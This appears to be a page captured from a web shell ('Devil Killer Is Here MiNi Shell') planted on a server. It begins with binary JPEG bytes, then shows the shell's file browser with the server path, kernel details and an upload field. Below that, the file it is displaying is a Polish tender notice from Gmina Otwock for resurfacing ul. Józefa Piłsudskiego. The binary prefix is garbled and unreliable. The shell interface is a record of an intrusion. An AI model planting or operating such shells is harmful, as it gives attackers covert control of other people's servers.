JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20250924/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20250924/0044031801-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Wykonanie wymiany nawierzchni na ul. Józefa Piłsudskiego wraz z remontem chodnika i uporządkowaniem pasa zieleni w ramach zadania budżetowego pn.: „Remont drogi gminnej (...) </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Otwock</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 013268770</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Armii Krajowej 5</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Otwock</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">05-400</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL912 - Warszawski wschodni</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia@otwock.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.bip.otwock.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Wykonanie wymiany nawierzchni na ul. Józefa Piłsudskiego wraz z remontem chodnika i uporządkowaniem pasa zieleni w ramach zadania budżetowego pn.: „Remont drogi gminnej (...) </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-2964a518-806d-4e27-be9f-066ab2350d25</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00440318</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-09-24</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://otwock.ezamawiajacy.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Komunikacja za pośrednictwem Platformy Zamawiającego<br/>https://otwock.ezamawiajacy.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. W przedmiotowym postępowaniu<br/>Zamawiający dopuszcza możliwość przekazywania sobie przez strony postępowania oświadczeń, wniosków, zawiadomień oraz<br/>informacji:1.1. Elektronicznie za pośrednictwem Platformy znajdującej się pod adresem: https://otwock.ezamawiajacy.pl w<br/>zakładce„Korespondencja”.2. Ogólne zasady korzystania z Platformy,<br/>;2.1.zgłoszenie do postępowania wymaga zalogowania Wykonawcy do Systemu na subdomenie Miasto Otwock ;<br/>https://otwock.ezamawiajacy.pl, lub https://oneplace.marketplanet.pl.2.2. Wykonawca po wybraniu opcji „przystąp do postępowania”<br/>zostanie przekierowany do strony https://oneplace.marketplanet.pl, gdzie zostanie powiadomiony o możliwości zalogowania lub do<br/>założenia bezpłatnego konta.<br/>Wykonawca zakłada konto wykonując kroki procesu rejestracyjnego; podaje adres e -mail, ustanawia hasło, następnie powtarza<br/>hasło, wpisuje kod z obrazka, akceptuje regulamin, klika polecenie „zarejestruj się”. 2.3. Rejestracja Wykonawcy trwa maksymalnie<br/>do 2 dni roboczych. W związku z tym Zamawiający zaleca Wykonawcom uwzględnienie czasu niezbędnego na rejestrację w<br/>procesie złożenia Oferty w postaci elektronicznej. Wykonawca wraz z potwierdzeniem złożenia wniosku rejestracyjnego otrzyma<br/>informacje, o możliwości przyspieszenia procedury założenia konta, wówczas<br/>należy skontaktować się pod numerem telefonu podanym w ww. potwierdzeniu. 2.4.Po założeniu konta Wykonawca ma możliwość<br/>złożenia Oferty w postępowaniu. Komunikacja między Zamawiającym a<br/>Wykonawcami, w szczególności zawiadomienia oraz informacje, przekazywane są w formie elektronicznej za pośrednictwem<br/>Platformy Zakupowej. Za datę przekazania zaświadczeń oraz informacji przyjmuje się datę ich wysłania za pośrednictwem zakładki<br/>„Korespondencja”.3.Zamawiający zgodnie określa dopuszczalny format podpisu elektronicznego, jako:3.1. dokumenty w formacie<br/>„pdf&#34; zaleca się podpisywać formatem PAdES,3.2. dopuszcza się podpisanie dokumentów w formacie innym niż „pdf&#34;, wtedy będzie<br/>wymagany oddzielny plik z podpisem. W związku z tym Wykonawca będzie zobowiązany załączyć prócz podpisanego dokumentu<br/>oddzielny plik z podpisem.4.Zamawiający określa dopuszczalne formaty przesyłanych danych tj. plików o wielkości do 100 MB wtxt,<br/>rtf, pdf ,xps, odt, ods, odp, doc, xls, ppt, docx, xlsx, pptx, csv, jpg, jpeg, tif, tiff, geotiff, png, svg,wav, mp3, avi, mpg, mpeg, mp4, m4a,<br/>mpeg4, ogg, ogv, zip, tar, gz, gzip, 7z, html, xhtml, css, xml, xsd,gml, rng, xsl, xslt,TSL, XMLsig, XAdES, CAdES, ASIC, XMLenc.<br/>5. Zamawiający określa informacje na temat kodowania i czasu odbioru danych tj.:5.1. Plik załączony przez Wykonawcę na<br/>Platformie Zakupowej i zapisany, widoczny jest w Systemie, jako zaszyfrowany – format kodowania UTF8.Możliwość otworzenia<br/>pliku dostępna jest dopiero po odszyfrowaniu przez Zamawiającego po upływie terminu otwarcia ofert.6. Oznaczenie czasu odbioru<br/>danych przez Platformę stanowi datę oraz dokładny czas (hh:mm:ss)</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">WZP.271.32.2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 4.1.	Zakres robót:<br/> Wykonanie remontu (wymiany) nawierzchni w ul. Józefa Piłsudskiego na odcinku od ul. Warszawskiej do ul. Reymonta, jezdnia szerokości 5,5 m wraz z remontem chodnika przyległym do jezdni po prawej stronie wraz z uporządkowaniem pasa zieleni przyległego do jezdni po lewej stronie.<br/> Długość remontowanego odcinka ok. 910,00 m, <br/>1)	Prace rozbiórkowe <br/>a) całkowita rozbiórka istniejącego stanu drogi, tzn. demontaż krawężników, oporników, istniejącej trelinki z drogi, płyt chodnikowych z chodnika,<br/>b)	demontaż istniejącej betonowej podmurówki biegnącej wzdłuż drogi<br/>c) w celu poprawy bezpieczeństwa pieszych ze szczególnymi potrzebami wymagane jest zamontowanie na chodnikach elementów umożliwiających identyfikację przeszkód np. przejść dla pieszych,<br/>2)	Prace budowlane<br/>a)	wykonanie nawierzchni bitumicznej ścieralne o szerokości 550 cm, od strony chodnika wystający krawężnik od strony pobocza z kruszywem opornik betonowy wtopiony wg szkicu projektowego.<br/>b) wykonanie remontu odwodnienia poprzez wymianę wskazanych studzienek odwodnieniowych z wpustami i przykanalikami do istniejących studni chłonnych wraz z ich oczyszczeniem i remontem/ wymiana istniejących wpustów drogowych na nowe, istniejące studnie do oczyszczenia. <br/>c)	na odcinku od ul. Władysława Reymonta do skrzyżowania z ul. Jana Kilińskiego przekrój daszkowy o spadku 1,5%<br/>d)	na odcinku od ul. Jana Kilińskiego do ul. Warszawskiej przekrój spadek jednostronny 1,5%,<br/>e) na całej długości ul. J. Piłsudskiego od ul. Warszawskiej do ul. Reymonta po prawej stronie chodnik z kostki betonowej szarej typu Hollad szerokości 230 cm o spadku jednostronnym 1,5% w kierunku jezdni. Chodnik układany pomiędzy obrzeżem betonowym od strony zieleni a wystającym krawężnikiem od strony jezdni.<br/>f) oczyszczenie pasa drogowego z rekultywacją terenu zielonego i obsianiem trawą <br/>g)	na odcinku od ul Warszawskiej do działki 17/9 obr.76 ( po lewej stronie) wykonanie drenażu francuskiego pobocza z kruszywa szerokości 100 cm. Spadek w kierunku pasa zieleni 2,5%. <br/>h)	na odcinku od ul Warszawskiej do działki 17/9 obr.76 ( po lewej stronie) za drenażem francuskim wykonanie pasa zieleni o szerokości 220 cm. Spadek w kierunku drenażu francuskiego 2,5%.<br/>i)	wykonanie zjazdów asfaltowych w skrzyżowaniach z istniejącymi drogami tj. ul. Elizy Orzeszkowej, ul. Andrzeja Strugi, ul. Jana Kilinskiego, ul. Marii Konopnickiej, ul. Jana Kurnakowicza, ul. Bolesława Prusa, ul. Szlacheckiej.<br/>j)	wszystkie zjazdy i dojścia wykonać z kostki grafitowej Behaton w opornikach wg szkicu projektowego tj. do działki 6/2 obr. 78, dz. nr 9/10 obr.78, dz. nr 2/2 obr.78, dz.nr 2/1 obr.78<br/>k) przekrój drogi wg szkicu projektowego: <br/>- warstwa ścieralna AC 11S dla KR3 gr 4 cm<br/>- warstwa wyrównawcza AC 16W50/70 dla KR3-5 cm<br/>- warstwa podbudowy : kruszywo łamane 0-63 mm, grubości 25 cm<br/>- podłoże gruntowe doprowadzone do grupy nośności G1 E2 &gt; 80 MPa<br/> 4.2 Specyfikacja warunków zamówienia oraz ofertą przetargową Wykonawcy stanowią integralną część umowy i przechowywane są w Wydziale Zamówień Publicznych oraz Wydziale Inwestycji.<br/>Oferta musi zawierać ceny jednostkowe.<br/>Ceny jednostkowe są wiążące dla Wykonawcy przez cały okres trwania umowy jak również w przypadku zlecenia prac dodatkowych.<br/> 4.3 Ponadto do obowiązków Wykonawcy należy:<br/>1)	wykonanie przedmiotu umowy zgodnie z obowiązującymi przepisami, normami i zasadami wiedzy technicznej z zachowaniem należytej staranności, bezpieczeństwa, dobrej jakości i właściwej organizacji,<br/>2)	ponoszenie odpowiedzialności prawnej za przejęty teren budowy oraz utrzymywanie terenu budowy w stanie zapewniającym bezpieczeństwo osób trzecich z uwzględnieniem nie będzie składowania żadnych zbędnych urządzeń pomocniczych, zbędnych materiałów, odpadów i śmieci, <br/>3)	wykonanie przedmiotu umowy pod nadzorem osoby posiadającej stosowne uprawnienia budowlane (kierownik budowy), zapewnienie stałego nadzoru i kontroli prowadzonych robót,<br/>4)	opracowanie i wprowadzenie organizacji ruchu na czas prowadzenia robót,<br/>5)	powiadomienie o terminie rozpoczęcia robót z 7 dniowym wyprzedzeniem wszystkich gestorów sieci, <br/>6)	powiadomienie pisemne Zamawiającego o wykonaniu tych czynności oraz prowadzenie robót przy asyście uprawnionych przedstawicieli gestorów sieci, jeżeli jest wymagane przepisami prawa lub/i będzie wymagane przez gestora danej sieci,<br/>7)	na żądanie Zamawiającego lub w razie stwierdzonej potrzeby wykonanie niezbędnych badań nośności podłoża w miejscu wykonywania nawierzchni (na prośbę Zamawiającego),<br/>8)	regulacja urządzeń znajdujących się w pasie drogowym w uzgodnieniu z właścicielami sieci, osadzenie regulacji zaworów gazowych i wodociągowych na zaprawie cementowej i zgodnie ze sztuką budowlaną;<br/>9)	uzgodnienie z Zamawiającym technologii uszczelnienia poszczególnych elementów urządzeń odwodnieniowych w miejscach łączenia podczas wymiany, modernizacji lub wykonania nowej infrastruktury odwodnieniowej,<br/>10) oczyszczenie istniejących odwodnień i wpustów oraz udrożnienie systemu odwodnienia, a w przypadku złego stanu technicznego wymiana studzienek, wpustów, oczyszczenie studni chłonnych z dostosowaniem do geometrii ulicy,<br/>11) ewentualna przebudowa kolidujących elementów sieci uzbrojenia napowietrznego, nadziemnego i podziemnego wraz z regulacją urządzeń znajdujących się w pasie drogowym w uzgodnieniu z właścicielami sieci, <br/>12) uzyskanie akceptacji Zamawiającego na wytyczenie ulicy przed ustawieniem oporników/krawężników oraz ustawienie oporników na wysokości zjazdów lub poniżej,<br/>13)	dopasowanie niwelety poniżej istniejących zjazdów na posesje celem uniknięcia spływania wód opadowych na teren prywatny. W przypadku zjazdów wykonanych z kostki brukowej zjazd należy przebudować i dopasować do rzędnej ulicy, a w innych wypadkach wysypać i zagęścić kruszywem 0-31,5 mm,<br/>14)	uzyskanie akceptacji Zamawiającego wyznaczonej niwelety drogi, <br/>15)	zabezpieczenie terenu budowy, sąsiednich obiektów, w szczególności drzew nieprzeznaczonych do wycinki, które w wyniku prowadzonych robót mogłyby ulec zniszczeniu lub uszkodzeniu w wyniku lub podczas prowadzonych robót. Sposób zabezpieczenia wymaga dokonania uzgodnień z Zamawiającym<br/>16)	wykonanie cięć pielęgnacyjnych drzew i krzewów oraz w przypadku konieczności wycinki drzew i krzewów w pasie drogowym,<br/>17)	zastosowanie oznaczenia pionowego - znaki U9A/U9b, w przypadku przeszkód pionowych (np. słupów, drzew) w odległości nie większej niż 0,5 m,<br/>18)	zgłaszanie, przez Kierownika budowy, przedstawicielowi Zamawiającego do odbioru robót zanikających i ulegających zakryciu,<br/>19)	zapewnienie bieżącej obsługi geodezyjnej wraz z inwentaryzacją geodezyjną wykonanych prac,<br/>20)	uzgodnienie z firmą zajmującą się gospodarką odpadami komunalnymi dostępu do posesji celem wywozu nieczystości stałych,<br/>21)	organizacja zaplecza budowy,<br/>22)	ubezpieczenie budowy,<br/>23)	wykonanie niezbędnych robót towarzyszących i czynności formalno-prawnych umożliwiających prowadzenie robót zgodnie z prawem i przekazanie wykonanych obiektów do eksploatacji - między innymi odbiorów technicznych, a także sporządzenia kompletnej dokumentacji powykonawczej z zaznaczeniem wprowadzonych zmian,<br/>24)	wykonanie wszystkich innych prac nieujętych w umowie oraz towarzyszących i niezbędnych do prawidłowego wykonania przedmiotu umowy, w tym zabezpieczenie terenu podczas prowadzenia prac oraz uporządkowania terenu w rejonie wykonywanych prac po ich zakończeniu,<br/>25)	rekultywacja przyległego terenu z humusowaniem i obsianiem trawą,<br/>26)	odtworzenie oznakowania poziomego i pionowego wg projektu stałej organizacji ruchu,<br/>27)	zapewnienie bezpiecznego dojścia do posesji i w miarę możliwości umożliwienie wjazdu na posesję w trakcie prowadzonych robót.<br/>4.4 Przedmiot zamówienia będzie wykonywany zgodnie z zasadami wiedzy technicznej i sztuki budowlanej, zgodnie z obowiązującymi przepisami, normami oraz na warunkach ustalonych z Wykonawcą na podstawie umowy. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233140-2 - Roboty drogowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45111200-0 - Roboty w zakresie przygotowania terenu pod budowę i roboty ziemne</p> <p class="mb-0">45233100-0 - Roboty w zakresie budowy autostrad, dróg</p> <p class="mb-0">45232451-8 - Roboty odwadniające i nawierzchniowe</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">70 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane: <span class="normal">Zamawiający przewiduje udzielanie zamówień, o których mowa w art. 305 pkt 1) w związku z art. 214 ust. 1 pkt 7 p.z.p. o wartości netto: 1 308 00,00 zł w zakresie polegającym na powtórzeniu podobnych rodzajowo prac zgodnych z przedmiotem zamówienia podstawowego.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 6</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. Z postępowania o udzielenie zamówienia wyklucza się Wykonawców, w stosunku do których zachodzi którakolwiek z okoliczności wskazanych w:<br/>1) w art. 108 ust. 1 p.z.p. Wykluczenie Wykonawcy następuje zgodnie z art. 111 p.z.p.;<br/>2) art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego. Wykluczenie Wykonawcy następuje na okres trwania okoliczności określonych w/w art. 7 ust 1. . oraz nie podlegam wykluczeniu z postępowania na art. 5k Rozporządzenia Rady (UE) nr 833/2014 z dnia 31 lipca 2014 r. dotyczącego środków ograniczających w związku z działaniami Rosji destabilizującymi sytuację na Ukrainie (Dz. Urz. UE nr L 229 z 31.7.2014, str. 1), dalej: rozporządzenie 833/2014, w brzmieniu nadanym rozporządzeniem Rady (UE) 2022/576 w sprawie zmiany rozporządzenia (UE) nr 833/2014 dotyczącego środków ograniczających w związku z działaniami Rosji destabilizującymi sytuację na Ukrainie (Dz. Urz. UE nr L 111 z 8.4.2022, str. 1), dalej: rozporządzenie 2022/576.<br/>2. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu na zasadach określonych w Rozdziale IX SWZ, oraz spełniają określone przez Zamawiającego warunki udziału w postępowaniu dotyczące:<br/>1) sytuacji ekonomicznej lub finansowej:<br/>a)	Wykonawca potwierdzi posiadanie środków finansowych lub zdolności kredytowej na kwotę nie mniejszą niż 500 000,00 złotych (słownie: pięćset tysięcy złotych). Zamawiający nie dopuszcza sumowania zdolności kredytowej (jednego) Wykonawcy potwierdzonej przez różne instytucje (banki). W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia (konsorcjum) Zamawiający wskazuje na możliwość sumowania zdolności kredytowej poszczególnych członków konsorcjum.<br/>2) zdolności technicznej lub zawodowej: <br/>a)	Wykonawca spełni warunek, jeżeli wykaże, że dysponuje/będzie dysponował: <br/>co najmniej 1 osobą, która będzie uczestniczyć w wykonaniu zamówienia <br/>na stanowisku kierownika robót, posiadającą ważne uprawnienia budowlane <br/>do kierowania robotami budowlanymi w specjalności drogowej lub odpowiadające im ważne uprawnienia budowlane, w zakresie pełnionej funkcji, które zostały wydane na podstawie wcześniej obowiązujących przepisów.<br/>b)	Wykonawca spełni warunek, jeżeli wykaże, że w okresie ostatnich 5 lat, przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy to w tym okresie wykonał co najmniej jedną robotę budowlaną polegające na wykonaniu ulic z nawierzchni asfaltowej o sumarycznej długości min. 1km. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> Wykonawca zobowiązany jest do zabezpieczenia swojej oferty wadium w wysokości: 35 000,00 zł <h3 